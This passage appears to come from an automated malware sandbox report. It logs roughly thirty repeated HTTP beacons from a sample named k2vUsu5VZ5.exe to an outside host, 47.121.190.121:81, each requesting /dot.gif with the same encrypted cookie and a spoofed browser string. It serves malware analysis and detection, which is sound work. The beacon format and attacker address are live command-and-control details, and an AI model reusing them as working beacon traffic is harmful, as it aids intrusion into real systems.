              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:42.676697969 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:42 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.44977747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:42.920033932 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:43.851610899 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:43 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              42192.168.2.44977847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:44.067008972 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:45.015392065 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:44 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              43192.168.2.44977947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:45.139488935 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:46.156102896 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:45 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              44192.168.2.44978047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:46.291229963 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:47.259114981 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:47 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              45192.168.2.44978147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:47.372627974 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:48.474929094 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:48 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              46192.168.2.44978247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:48.591087103 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:49.569186926 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:49 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              47192.168.2.44978347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:49.684834957 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:50.687247038 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:50 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              48192.168.2.44978547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:50.809571028 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:51.895996094 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:51 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              49192.168.2.44978647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:52.012828112 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:53.001020908 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:52 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              50192.168.2.44978747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:53.126132965 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:54.063759089 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:53 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              51192.168.2.44978947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:54.184781075 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:55.153366089 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:54 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              52192.168.2.44979547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:55.279933929 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:56.241408110 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:56 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              53192.168.2.44980147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:56.376281977 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:57.316638947 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:57 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              54192.168.2.44980747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:57.434493065 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:58.395900011 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:58 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              55192.168.2.44981847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:58.514369011 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:59.623790979 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:59 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              56192.168.2.44982447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:59.747189999 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:00.692666054 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:00 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              57192.168.2.44983047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:00.809634924 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:01.758723974 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:01 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              58192.168.2.44983747.121.190.12181
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:01.874717951 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:02.810645103 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:02 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              59192.168.2.44984147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:02.943342924 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:03.988145113 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:03 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              60192.168.2.44984947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:04.231498003 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:05.321083069 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:05 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              61192.168.2.44985647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:05.452390909 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:06.413224936 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:06 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              62192.168.2.44986347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:06.528783083 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:07.532258034 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:07 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              63192.168.2.44987347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:07.653525114 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:08.601628065 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:08 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              64192.168.2.44987947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:08.745033026 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:09.788600922 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:09 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              65192.168.2.44988647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:09.904177904 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:10.873101950 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:10 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              66192.168.2.44989347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:10.986663103 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:11.954770088 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              67192.168.2.44990247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:12.075596094 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:13.119453907 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:12 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              68192.168.2.44990947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:13.236175060 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:14.194960117 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:14 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              69192.168.2.44991647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:14.310036898 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
